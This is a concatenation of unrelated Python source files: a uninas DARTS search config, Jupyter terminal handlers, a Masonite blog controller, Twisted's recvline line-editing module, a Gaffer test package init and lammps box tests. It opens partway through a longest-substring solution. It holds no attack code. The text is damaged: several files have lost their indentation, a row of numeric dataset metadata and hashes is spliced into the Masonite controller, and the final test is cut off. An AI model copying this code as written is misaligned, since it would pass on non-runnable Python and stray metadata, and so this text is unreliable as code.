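        if ch in seen and seen[ch] >= start:
            # Repeat inside the window: move the left edge past it.
            start = seen[ch] + 1
        seen[ch] = i
        best = max(best, i - start + 1)
    return best


print(length_of_longest_substring("pwwkew"))  # 3 ("wke")
```

Each character is visited once, so this runs in O(n) time and O(min(n, alphabet)) space.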


# experiments/examples/example_d1.py (cogsys-tuebingen/uninas, MIT License)
from uninas.main import Main
"""
search the architecture of a small network via DARTS algorithm
beware that we are using fake data
"""
args = {
"cls_task": "SingleSearchTask",
"{cls_task}.save_dir": "{path_tmp}/d1/",
"{cls_task}.save_del_old": True,
"{cls_task}.is_test_run": True,
"cls_device": "CudaDevicesManager",
"{cls_device}.num_devices": 1,
"cls_trainer": "SimpleTrainer", # SimpleTrainer, LightningTrainer
"{cls_trainer}.max_epochs": 3,
"{cls_trainer}.eval_last": 2,
"{cls_trainer}.test_last": 2,
"cls_exp_loggers": "TensorBoardExpLogger",
"{cls_exp_loggers#0}.log_graph": False,
"cls_data": "Cinic10Data",
# "cls_data": "Cifar10Data",
"{cls_data}.fake": True,
"{cls_data}.valid_split": 0.0,
"{cls_data}.batch_size_train": 2,
"cls_augmentations": "DartsCifarAug",
"cls_method": "DartsSearchMethod", # DartsSearchMethod
"cls_network": "SearchUninasNetwork",
"cls_network_body": "StackedCellsNetworkBody",
"{cls_network_body}.cell_order": "n, n, r, n, n, r, n, n",
"{cls_network_body}.features_first_cell": 64,
"cls_network_stem": "DartsCifarStem",
"{cls_network_stem}.features": 48,
"cls_network_heads": "ClassificationHead",
"{cls_network_heads#0}.weight": 1.0,
"{cls_network_heads#0}.cell_idx": -1,
"{cls_network_heads#0}.persist": "True",
"cls_network_cells": "DartsCNNSearchCell, DartsCNNSearchCell",
"{cls_network_cells#0}.name": "n",
"{cls_network_cells#0}.arc_key": "n",
"{cls_network_cells#0}.arc_shared": True,
"{cls_network_cells#0}.features_mult": 1,
"{cls_network_cells#0}.stride": 1,
"{cls_network_cells#0}.num_concat": 4,
"{cls_network_cells#0}.num_blocks": 4,
"{cls_network_cells#0}.cls_block": "DartsCNNSearchBlock",
"{cls_network_cells#1}.name": "r",
"{cls_network_cells#1}.arc_key": "r",
"{cls_network_cells#1}.arc_shared": True,
"{cls_network_cells#1}.features_mult": 2,
"{cls_network_cells#1}.stride": 2,
"{cls_network_cells#1}.num_concat": 4,
"{cls_network_cells#1}.num_blocks": 4,
"{cls_network_cells#1}.cls_block": "DartsCNNSearchBlock",
"cls_network_cells_primitives": "DartsPrimitives, DartsPrimitives",
"cls_metrics": "AccuracyMetric",
"cls_initializers": "",
"cls_regularizers": "DropOutRegularizer, DropPathRegularizer",
"{cls_regularizers#1}.max_prob": 0.3,
"cls_criterion": "CrossEntropyCriterion",
"cls_optimizers": "SGDOptimizer, AdamOptimizer",
"{cls_optimizers#0}.lr": 0.05,
"{cls_optimizers#0}.momentum": 0.5,
"{cls_optimizers#1}.lr": 0.03,
"{cls_optimizers#1}.weight_decay": 1e-2,
"cls_schedulers": "CosineScheduler, ConstantScheduler",
}
if __name__ == "__main__":
# ignore the command line, use "args" instead
task = Main.new_task([], args_changes=args)
task.load()
task.run()
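The `{cls_…#i}.param` keys in the args dict above address a parameter of the i-th class in a comma-separated class list. As a rough, standalone illustration of how such templated keys could be resolved (this is not the uninas implementation; `resolve_key` and its return shape are invented for this sketch):

```python
# Hypothetical resolver for "{cls_optimizers#0}.lr"-style keys; uninas'
# real argument machinery differs, this only illustrates the addressing idea.
import re

def resolve_key(args, key):
    """Map a templated key to (class name, parameter name)."""
    m = re.match(r"\{(\w+)(?:#(\d+))?\}\.(\w+)", key)
    if m is None:
        raise ValueError("not a templated key: %r" % key)
    group, idx, param = m.group(1), int(m.group(2) or 0), m.group(3)
    classes = [c.strip() for c in args[group].split(",")]
    return classes[idx], param

example = {
    "cls_optimizers": "SGDOptimizer, AdamOptimizer",
    "{cls_optimizers#1}.lr": 0.03,
}
resolve_key(example, "{cls_optimizers#1}.lr")  # ('AdamOptimizer', 'lr')
```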
# ---------------------------------------------------------------------------
# File: venv/Lib/site-packages/notebook/terminal/handlers.py
# Repo: BoxicaLion/BasicMathFormulas | License: MIT
# ---------------------------------------------------------------------------
#encoding: utf-8
"""Tornado handlers for the terminal emulator."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from tornado import web
import terminado
from notebook._tz import utcnow
from ..base.handlers import IPythonHandler
from ..base.zmqhandlers import WebSocketMixin
class TerminalHandler(IPythonHandler):
"""Render the terminal interface."""
@web.authenticated
def get(self, term_name):
self.write(self.render_template('terminal.html',
ws_path="terminals/websocket/%s" % term_name))
class TermSocket(WebSocketMixin, IPythonHandler, terminado.TermSocket):
def origin_check(self):
"""Terminado adds redundant origin_check
Tornado already calls check_origin, so don't do anything here.
"""
return True
def get(self, *args, **kwargs):
if not self.get_current_user():
raise web.HTTPError(403)
return super(TermSocket, self).get(*args, **kwargs)
def on_message(self, message):
super(TermSocket, self).on_message(message)
self.application.settings['terminal_last_activity'] = utcnow()
def write_message(self, message, binary=False):
super(TermSocket, self).write_message(message, binary=binary)
self.application.settings['terminal_last_activity'] = utcnow()
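Both `on_message` and `write_message` stamp `terminal_last_activity`, which lets an idle-culling service decide whether any terminal traffic has been seen recently. A minimal sketch of such a check (the `IDLE_TIMEOUT` value and `terminals_idle` helper are stand-ins, not notebook's actual culler):

```python
from datetime import datetime, timedelta, timezone

IDLE_TIMEOUT = timedelta(minutes=10)  # stand-in value, not notebook's default

def utcnow():
    # notebook._tz.utcnow returns a timezone-aware UTC datetime; this mimics it.
    return datetime.now(timezone.utc)

def terminals_idle(settings, now=None):
    """True if no terminal traffic was recorded within IDLE_TIMEOUT."""
    now = now or utcnow()
    last = settings.get('terminal_last_activity')
    return last is None or now - last > IDLE_TIMEOUT

settings = {'terminal_last_activity': utcnow()}
terminals_idle(settings)  # False: activity was just recorded
```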
# ---------------------------------------------------------------------------
# File: app/http/controllers/BlogController.py
# Repo: Balogunolalere/masonite-crud | License: MIT
# ---------------------------------------------------------------------------
"""A BlogController Module."""
from masonite.request import Request
from masonite.view import View
from masonite.controllers import Controller
from app.Post import Post
class BlogController(Controller):
"""BlogController Controller Class."""
def __init__(self, request: Request):
"""BlogController Initializer
Arguments:
request {masonite.request.Request} -- The Masonite Request class.
"""
self.request = request
def show(self, view: View):
posts = Post.all()
        return view.render('posts', {'posts': posts})
def update(self, view: View, request: Request):
post = Post.find(request.param('id'))
return view.render('article', {'post': post})
    def store(self, request: Request):
post = Post.find(request.param('id'))
post.body = request.input('body')
post.save()
return request.redirect('/articles')
    def remove(self, view: View, request: Request):
        post = Post.find(request.param('id'))
        return view.render('delete', {'post': post})
    def delete(self, request: Request):
post = Post.find(request.param('id'))
post.delete()
return request.redirect('/articles') | 25 | 68 | 0.709091 | 139 | 1,100 | 5.582734 | 0.266187 | 0.126289 | 0.092784 | 0.113402 | 0.298969 | 0.298969 | 0.298969 | 0.298969 | 0.298969 | 0.298969 | 0 | 0 | 0.137273 | 1,100 | 44 | 69 | 25 | 0.817703 | 0.154545 | 0 | 0.24 | 0 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0 | 0.16 | 0 | 0.64 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6a6febf419baf8f465358e758f801c5fbc25d396 | 19,172 | py | Python | src/twisted/conch/recvline.py | ndg63276/twisted | f672a20395e8beece6350631a70514f06c391bae | [
"Unlicense",
"MIT"
] | 2 | 2021-03-27T20:11:56.000Z | 2021-05-04T19:34:44.000Z | src/twisted/conch/recvline.py | ndg63276/twisted | f672a20395e8beece6350631a70514f06c391bae | [
"Unlicense",
"MIT"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | src/twisted/conch/recvline.py | ndg63276/twisted | f672a20395e8beece6350631a70514f06c391bae | [
"Unlicense",
"MIT"
] | 2 | 2021-05-29T21:12:22.000Z | 2021-05-30T04:56:50.000Z | # -*- test-case-name: twisted.conch.test.test_recvline -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Basic line editing support.
@author: Jp Calderone
"""
import string
from typing import Dict
from zope.interface import implementer
from twisted.conch.insults import insults, helper
from twisted.python import reflect
from twisted.python.compat import iterbytes
from twisted.logger import Logger
_counters = {} # type: Dict[str, int]
class Logging:
"""
Wrapper which logs attribute lookups.
This was useful in debugging something, I guess. I forget what.
It can probably be deleted or moved somewhere more appropriate.
Nothing special going on here, really.
"""
def __init__(self, original):
self.original = original
key = reflect.qual(original.__class__)
count = _counters.get(key, 0)
_counters[key] = count + 1
self._logFile = open(key + "-" + str(count), "w")
def __str__(self) -> str:
return str(super().__getattribute__("original"))
def __repr__(self) -> str:
return repr(super().__getattribute__("original"))
def __getattribute__(self, name):
original = super().__getattribute__("original")
logFile = super().__getattribute__("_logFile")
logFile.write(name + "\n")
return getattr(original, name)
@implementer(insults.ITerminalTransport)
class TransportSequence:
"""
An L{ITerminalTransport} implementation which forwards calls to
one or more other L{ITerminalTransport}s.
This is a cheap way for servers to keep track of the state they
expect the client to see, since all terminal manipulations can be
    sent to the real client and to a terminal emulator that lives in
the server process.
"""
for keyID in (
b"UP_ARROW",
b"DOWN_ARROW",
b"RIGHT_ARROW",
b"LEFT_ARROW",
b"HOME",
b"INSERT",
b"DELETE",
b"END",
b"PGUP",
b"PGDN",
b"F1",
b"F2",
b"F3",
b"F4",
b"F5",
b"F6",
b"F7",
b"F8",
b"F9",
b"F10",
b"F11",
b"F12",
):
execBytes = keyID + b" = object()"
execStr = execBytes.decode("ascii")
exec(execStr)
TAB = b"\t"
BACKSPACE = b"\x7f"
def __init__(self, *transports):
assert transports, "Cannot construct a TransportSequence with no transports"
self.transports = transports
for method in insults.ITerminalTransport:
exec(
"""\
def %s(self, *a, **kw):
for tpt in self.transports:
result = tpt.%s(*a, **kw)
return result
"""
% (method, method)
)
def getHost(self):
# ITransport.getHost
raise NotImplementedError("Unimplemented: TransportSequence.getHost")
def getPeer(self):
# ITransport.getPeer
raise NotImplementedError("Unimplemented: TransportSequence.getPeer")
def loseConnection(self):
# ITransport.loseConnection
raise NotImplementedError("Unimplemented: TransportSequence.loseConnection")
def write(self, data):
# ITransport.write
raise NotImplementedError("Unimplemented: TransportSequence.write")
def writeSequence(self, data):
# ITransport.writeSequence
raise NotImplementedError("Unimplemented: TransportSequence.writeSequence")
def cursorUp(self, n=1):
# ITerminalTransport.cursorUp
raise NotImplementedError("Unimplemented: TransportSequence.cursorUp")
def cursorDown(self, n=1):
# ITerminalTransport.cursorDown
raise NotImplementedError("Unimplemented: TransportSequence.cursorDown")
def cursorForward(self, n=1):
# ITerminalTransport.cursorForward
raise NotImplementedError("Unimplemented: TransportSequence.cursorForward")
def cursorBackward(self, n=1):
# ITerminalTransport.cursorBackward
raise NotImplementedError("Unimplemented: TransportSequence.cursorBackward")
def cursorPosition(self, column, line):
# ITerminalTransport.cursorPosition
raise NotImplementedError("Unimplemented: TransportSequence.cursorPosition")
def cursorHome(self):
# ITerminalTransport.cursorHome
raise NotImplementedError("Unimplemented: TransportSequence.cursorHome")
def index(self):
# ITerminalTransport.index
raise NotImplementedError("Unimplemented: TransportSequence.index")
def reverseIndex(self):
# ITerminalTransport.reverseIndex
raise NotImplementedError("Unimplemented: TransportSequence.reverseIndex")
def nextLine(self):
# ITerminalTransport.nextLine
raise NotImplementedError("Unimplemented: TransportSequence.nextLine")
def saveCursor(self):
# ITerminalTransport.saveCursor
raise NotImplementedError("Unimplemented: TransportSequence.saveCursor")
def restoreCursor(self):
# ITerminalTransport.restoreCursor
raise NotImplementedError("Unimplemented: TransportSequence.restoreCursor")
def setModes(self, modes):
# ITerminalTransport.setModes
raise NotImplementedError("Unimplemented: TransportSequence.setModes")
def resetModes(self, mode):
# ITerminalTransport.resetModes
raise NotImplementedError("Unimplemented: TransportSequence.resetModes")
def setPrivateModes(self, modes):
# ITerminalTransport.setPrivateModes
raise NotImplementedError("Unimplemented: TransportSequence.setPrivateModes")
def resetPrivateModes(self, modes):
# ITerminalTransport.resetPrivateModes
raise NotImplementedError("Unimplemented: TransportSequence.resetPrivateModes")
def applicationKeypadMode(self):
# ITerminalTransport.applicationKeypadMode
raise NotImplementedError(
"Unimplemented: TransportSequence.applicationKeypadMode"
)
def numericKeypadMode(self):
# ITerminalTransport.numericKeypadMode
raise NotImplementedError("Unimplemented: TransportSequence.numericKeypadMode")
def selectCharacterSet(self, charSet, which):
# ITerminalTransport.selectCharacterSet
raise NotImplementedError("Unimplemented: TransportSequence.selectCharacterSet")
def shiftIn(self):
# ITerminalTransport.shiftIn
raise NotImplementedError("Unimplemented: TransportSequence.shiftIn")
def shiftOut(self):
# ITerminalTransport.shiftOut
raise NotImplementedError("Unimplemented: TransportSequence.shiftOut")
def singleShift2(self):
# ITerminalTransport.singleShift2
raise NotImplementedError("Unimplemented: TransportSequence.singleShift2")
def singleShift3(self):
# ITerminalTransport.singleShift3
raise NotImplementedError("Unimplemented: TransportSequence.singleShift3")
def selectGraphicRendition(self, *attributes):
# ITerminalTransport.selectGraphicRendition
raise NotImplementedError(
"Unimplemented: TransportSequence.selectGraphicRendition"
)
def horizontalTabulationSet(self):
# ITerminalTransport.horizontalTabulationSet
raise NotImplementedError(
"Unimplemented: TransportSequence.horizontalTabulationSet"
)
def tabulationClear(self):
# ITerminalTransport.tabulationClear
raise NotImplementedError("Unimplemented: TransportSequence.tabulationClear")
def tabulationClearAll(self):
# ITerminalTransport.tabulationClearAll
raise NotImplementedError("Unimplemented: TransportSequence.tabulationClearAll")
def doubleHeightLine(self, top=True):
# ITerminalTransport.doubleHeightLine
raise NotImplementedError("Unimplemented: TransportSequence.doubleHeightLine")
def singleWidthLine(self):
# ITerminalTransport.singleWidthLine
raise NotImplementedError("Unimplemented: TransportSequence.singleWidthLine")
def doubleWidthLine(self):
# ITerminalTransport.doubleWidthLine
raise NotImplementedError("Unimplemented: TransportSequence.doubleWidthLine")
def eraseToLineEnd(self):
# ITerminalTransport.eraseToLineEnd
raise NotImplementedError("Unimplemented: TransportSequence.eraseToLineEnd")
def eraseToLineBeginning(self):
# ITerminalTransport.eraseToLineBeginning
raise NotImplementedError(
"Unimplemented: TransportSequence.eraseToLineBeginning"
)
def eraseLine(self):
# ITerminalTransport.eraseLine
raise NotImplementedError("Unimplemented: TransportSequence.eraseLine")
def eraseToDisplayEnd(self):
# ITerminalTransport.eraseToDisplayEnd
raise NotImplementedError("Unimplemented: TransportSequence.eraseToDisplayEnd")
def eraseToDisplayBeginning(self):
# ITerminalTransport.eraseToDisplayBeginning
raise NotImplementedError(
"Unimplemented: TransportSequence.eraseToDisplayBeginning"
)
def eraseDisplay(self):
# ITerminalTransport.eraseDisplay
raise NotImplementedError("Unimplemented: TransportSequence.eraseDisplay")
def deleteCharacter(self, n=1):
# ITerminalTransport.deleteCharacter
raise NotImplementedError("Unimplemented: TransportSequence.deleteCharacter")
def insertLine(self, n=1):
# ITerminalTransport.insertLine
raise NotImplementedError("Unimplemented: TransportSequence.insertLine")
def deleteLine(self, n=1):
# ITerminalTransport.deleteLine
raise NotImplementedError("Unimplemented: TransportSequence.deleteLine")
def reportCursorPosition(self):
# ITerminalTransport.reportCursorPosition
raise NotImplementedError(
"Unimplemented: TransportSequence.reportCursorPosition"
)
def reset(self):
# ITerminalTransport.reset
raise NotImplementedError("Unimplemented: TransportSequence.reset")
def unhandledControlSequence(self, seq):
# ITerminalTransport.unhandledControlSequence
raise NotImplementedError(
"Unimplemented: TransportSequence.unhandledControlSequence"
)
class LocalTerminalBufferMixin:
"""
A mixin for RecvLine subclasses which records the state of the terminal.
This is accomplished by performing all L{ITerminalTransport} operations on both
the transport passed to makeConnection and an instance of helper.TerminalBuffer.
@ivar terminalCopy: A L{helper.TerminalBuffer} instance which efforts
will be made to keep up to date with the actual terminal
associated with this protocol instance.
"""
def makeConnection(self, transport):
self.terminalCopy = helper.TerminalBuffer()
self.terminalCopy.connectionMade()
return super().makeConnection(TransportSequence(transport, self.terminalCopy))
def __str__(self) -> str:
return str(self.terminalCopy)
class RecvLine(insults.TerminalProtocol):
"""
L{TerminalProtocol} which adds line editing features.
Clients will be prompted for lines of input with all the usual
features: character echoing, left and right arrow support for
moving the cursor to different areas of the line buffer, backspace
and delete for removing characters, and insert for toggling
between typeover and insert mode. Tabs will be expanded to enough
spaces to move the cursor to the next tabstop (every four
characters by default). Enter causes the line buffer to be
cleared and the line to be passed to the lineReceived() method
which, by default, does nothing. Subclasses are responsible for
redrawing the input prompt (this will probably change).
"""
width = 80
height = 24
TABSTOP = 4
ps = (b">>> ", b"... ")
pn = 0
_printableChars = string.printable.encode("ascii")
_log = Logger()
def connectionMade(self):
# A list containing the characters making up the current line
self.lineBuffer = []
# A zero-based (wtf else?) index into self.lineBuffer.
# Indicates the current cursor position.
self.lineBufferIndex = 0
t = self.terminal
# A map of keyIDs to bound instance methods.
self.keyHandlers = {
t.LEFT_ARROW: self.handle_LEFT,
t.RIGHT_ARROW: self.handle_RIGHT,
t.TAB: self.handle_TAB,
# Both of these should not be necessary, but figuring out
# which is necessary is a huge hassle.
b"\r": self.handle_RETURN,
b"\n": self.handle_RETURN,
t.BACKSPACE: self.handle_BACKSPACE,
t.DELETE: self.handle_DELETE,
t.INSERT: self.handle_INSERT,
t.HOME: self.handle_HOME,
t.END: self.handle_END,
}
self.initializeScreen()
def initializeScreen(self):
# Hmm, state sucks. Oh well.
# For now we will just take over the whole terminal.
self.terminal.reset()
self.terminal.write(self.ps[self.pn])
# XXX Note: I would prefer to default to starting in insert
# mode, however this does not seem to actually work! I do not
# know why. This is probably of interest to implementors
# subclassing RecvLine.
# XXX XXX Note: But the unit tests all expect the initial mode
# to be insert right now. Fuck, there needs to be a way to
# query the current mode or something.
# self.setTypeoverMode()
self.setInsertMode()
def currentLineBuffer(self):
s = b"".join(self.lineBuffer)
return s[: self.lineBufferIndex], s[self.lineBufferIndex :]
def setInsertMode(self):
self.mode = "insert"
self.terminal.setModes([insults.modes.IRM])
def setTypeoverMode(self):
self.mode = "typeover"
self.terminal.resetModes([insults.modes.IRM])
def drawInputLine(self):
"""
Write a line containing the current input prompt and the current line
buffer at the current cursor position.
"""
self.terminal.write(self.ps[self.pn] + b"".join(self.lineBuffer))
def terminalSize(self, width, height):
# XXX - Clear the previous input line, redraw it at the new
# cursor position
self.terminal.eraseDisplay()
self.terminal.cursorHome()
self.width = width
self.height = height
self.drawInputLine()
def unhandledControlSequence(self, seq):
pass
def keystrokeReceived(self, keyID, modifier):
m = self.keyHandlers.get(keyID)
if m is not None:
m()
elif keyID in self._printableChars:
self.characterReceived(keyID, False)
else:
self._log.warn("Received unhandled keyID: {keyID!r}", keyID=keyID)
def characterReceived(self, ch, moreCharactersComing):
if self.mode == "insert":
self.lineBuffer.insert(self.lineBufferIndex, ch)
else:
self.lineBuffer[self.lineBufferIndex : self.lineBufferIndex + 1] = [ch]
self.lineBufferIndex += 1
self.terminal.write(ch)
def handle_TAB(self):
n = self.TABSTOP - (len(self.lineBuffer) % self.TABSTOP)
self.terminal.cursorForward(n)
self.lineBufferIndex += n
self.lineBuffer.extend(iterbytes(b" " * n))
def handle_LEFT(self):
if self.lineBufferIndex > 0:
self.lineBufferIndex -= 1
self.terminal.cursorBackward()
def handle_RIGHT(self):
if self.lineBufferIndex < len(self.lineBuffer):
self.lineBufferIndex += 1
self.terminal.cursorForward()
def handle_HOME(self):
if self.lineBufferIndex:
self.terminal.cursorBackward(self.lineBufferIndex)
self.lineBufferIndex = 0
def handle_END(self):
offset = len(self.lineBuffer) - self.lineBufferIndex
if offset:
self.terminal.cursorForward(offset)
self.lineBufferIndex = len(self.lineBuffer)
def handle_BACKSPACE(self):
if self.lineBufferIndex > 0:
self.lineBufferIndex -= 1
del self.lineBuffer[self.lineBufferIndex]
self.terminal.cursorBackward()
self.terminal.deleteCharacter()
def handle_DELETE(self):
if self.lineBufferIndex < len(self.lineBuffer):
del self.lineBuffer[self.lineBufferIndex]
self.terminal.deleteCharacter()
def handle_RETURN(self):
line = b"".join(self.lineBuffer)
self.lineBuffer = []
self.lineBufferIndex = 0
self.terminal.nextLine()
self.lineReceived(line)
def handle_INSERT(self):
assert self.mode in ("typeover", "insert")
if self.mode == "typeover":
self.setInsertMode()
else:
self.setTypeoverMode()
def lineReceived(self, line):
pass
class HistoricRecvLine(RecvLine):
"""
L{TerminalProtocol} which adds both basic line-editing features and input history.
Everything supported by L{RecvLine} is also supported by this class. In addition, the
up and down arrows traverse the input history. Each received line is automatically
added to the end of the input history.
"""
def connectionMade(self):
RecvLine.connectionMade(self)
self.historyLines = []
self.historyPosition = 0
t = self.terminal
self.keyHandlers.update(
{t.UP_ARROW: self.handle_UP, t.DOWN_ARROW: self.handle_DOWN}
)
def currentHistoryBuffer(self):
b = tuple(self.historyLines)
return b[: self.historyPosition], b[self.historyPosition :]
def _deliverBuffer(self, buf):
if buf:
for ch in iterbytes(buf[:-1]):
self.characterReceived(ch, True)
self.characterReceived(buf[-1:], False)
def handle_UP(self):
if self.lineBuffer and self.historyPosition == len(self.historyLines):
self.historyLines.append(b"".join(self.lineBuffer))
if self.historyPosition > 0:
self.handle_HOME()
self.terminal.eraseToLineEnd()
self.historyPosition -= 1
self.lineBuffer = []
self._deliverBuffer(self.historyLines[self.historyPosition])
def handle_DOWN(self):
if self.historyPosition < len(self.historyLines) - 1:
self.handle_HOME()
self.terminal.eraseToLineEnd()
self.historyPosition += 1
self.lineBuffer = []
self._deliverBuffer(self.historyLines[self.historyPosition])
else:
self.handle_HOME()
self.terminal.eraseToLineEnd()
self.historyPosition = len(self.historyLines)
self.lineBuffer = []
self.lineBufferIndex = 0
def handle_RETURN(self):
if self.lineBuffer:
self.historyLines.append(b"".join(self.lineBuffer))
self.historyPosition = len(self.historyLines)
return RecvLine.handle_RETURN(self)
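The tab handling in `handle_TAB` above pads the buffer with `TABSTOP - (len(lineBuffer) % TABSTOP)` spaces, which moves the cursor to the next tabstop. The same arithmetic, extracted into a standalone function outside the protocol class for clarity:

```python
TABSTOP = 4  # RecvLine's default tabstop width

def spaces_to_next_tabstop(line_length, tabstop=TABSTOP):
    """Number of spaces handle_TAB inserts for a buffer of this length."""
    return tabstop - (line_length % tabstop)

# A full tabstop is inserted when the cursor is already aligned:
[spaces_to_next_tabstop(n) for n in range(6)]  # [4, 3, 2, 1, 4, 3]
```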
# ---------------------------------------------------------------------------
# File: python/GafferTest/__init__.py
# Repo: Kthulhu/gaffer | License: BSD-3-Clause
# ---------------------------------------------------------------------------
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2015, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from _GafferTest import *
import unittest
# workaround lack of expectedFailure decorator for
# python < 2.7.
try :
expectedFailure = unittest.expectedFailure
except AttributeError :
def expectedFailure( f ) :
def wrapper( self ) :
try :
f( self )
except :
print "Expected failure"
return wrapper
from TestCase import TestCase
from AddNode import AddNode
from SphereNode import SphereNode
from SignalsTest import SignalsTest
from GraphComponentTest import GraphComponentTest
from FrameNode import FrameNode
from CachingTestNode import CachingTestNode
from NodeTest import NodeTest
from PlugTest import PlugTest
from NumericPlugTest import NumericPlugTest
from TypedPlugTest import TypedPlugTest
from ScriptNodeTest import ScriptNodeTest
from StandardSetTest import StandardSetTest
from FileSystemPathTest import FileSystemPathTest
from PathTest import PathTest
from PathFilterTest import PathFilterTest
from UndoTest import UndoTest
from SpeedTest import SpeedTest
from KeywordPlugNode import KeywordPlugNode
from CompoundNumericPlugTest import CompoundNumericPlugTest
from CompoundNumericNode import CompoundNumericNode
from CompoundPlugTest import CompoundPlugTest
from CompoundPlugNode import CompoundPlugNode
from TypedObjectPlugTest import TypedObjectPlugTest
from SplinePlugTest import SplinePlugTest
from AboutTest import AboutTest
from ChildSetTest import ChildSetTest
from PythonApplicationTest import PythonApplicationTest
from ApplicationRootTest import ApplicationRootTest
from ContextTest import ContextTest
from CompoundPathFilterTest import CompoundPathFilterTest
from BadNode import BadNode
from CapturingSlot import CapturingSlot
from LazyModuleTest import LazyModuleTest
from NodeBindingTest import NodeBindingTest
from DictPathTest import DictPathTest
from ExpressionTest import ExpressionTest
from BlockedConnectionTest import BlockedConnectionTest
from TimeWarpComputeNodeTest import TimeWarpComputeNodeTest
from TransformPlugTest import TransformPlugTest
from Transform2DPlugTest import Transform2DPlugTest
from SequencePathTest import SequencePathTest
from WeakMethodTest import WeakMethodTest
from StringInOutNode import StringInOutNode
from StringPlugTest import StringPlugTest
from ContextVariablesTest import ContextVariablesTest
from ValuePlugTest import ValuePlugTest
from RandomTest import RandomTest
from CompoundDataPlugTest import CompoundDataPlugTest
from DependencyNodeTest import DependencyNodeTest
from ComputeNodeTest import ComputeNodeTest
from BoxPlugTest import BoxPlugTest
from BoxTest import BoxTest
from OutputRedirectionTest import OutputRedirectionTest
from RecursiveChildIteratorTest import RecursiveChildIteratorTest
from FilteredRecursiveChildIteratorTest import FilteredRecursiveChildIteratorTest
from ReferenceTest import ReferenceTest
from OrphanRemoverTest import OrphanRemoverTest
from GraphComponentPathTest import GraphComponentPathTest
from ArrayPlugNode import ArrayPlugNode
from ArrayPlugTest import ArrayPlugTest
from SerialisationTest import SerialisationTest
from SwitchTest import SwitchTest
from MetadataTest import MetadataTest
from StringAlgoTest import StringAlgoTest
from NodeAlgoTest import NodeAlgoTest
from DotTest import DotTest
from ApplicationTest import ApplicationTest
from LeafPathFilterTest import LeafPathFilterTest
from MatchPatternPathFilterTest import MatchPatternPathFilterTest
from LoopTest import LoopTest
from SubGraphTest import SubGraphTest
from FileSequencePathFilterTest import FileSequencePathFilterTest
from AnimationTest import AnimationTest
from StatsApplicationTest import StatsApplicationTest
from DownstreamIteratorTest import DownstreamIteratorTest
from PerformanceMonitorTest import PerformanceMonitorTest
if __name__ == "__main__":
import unittest
unittest.main()
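The fallback `expectedFailure` defined near the top of this file simply swallows any exception raised by the wrapped test on Python < 2.7. The same wrapper pattern can be seen in isolation (Python 3 spelling; `Dummy` and `test_broken` are hypothetical names for this sketch):

```python
def expectedFailure(f):
    # Same shape as the fallback above: run the test and report a
    # failure rather than letting it propagate.
    def wrapper(self):
        try:
            f(self)
        except Exception:
            print("Expected failure")
    return wrapper

class Dummy:
    @expectedFailure
    def test_broken(self):
        raise AssertionError("known bug")

Dummy().test_broken()  # prints "Expected failure" instead of raising
```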
# ---------------------------------------------------------------------------
# File: tests/test_box.py
# Repo: mjclarke94/lammps-cython | License: MIT
# ---------------------------------------------------------------------------
from math import pi
import pytest
import numpy as np
import lammps
def test_lattice_const_to_lammps_box_cubic():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (0, 0, 0)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
def test_lattice_const_to_lammps_box_cubic_offset_origin():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (4, 3, 2)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
def test_lattice_to_lammps_box_cubic_transform():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (4, 3, 2)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
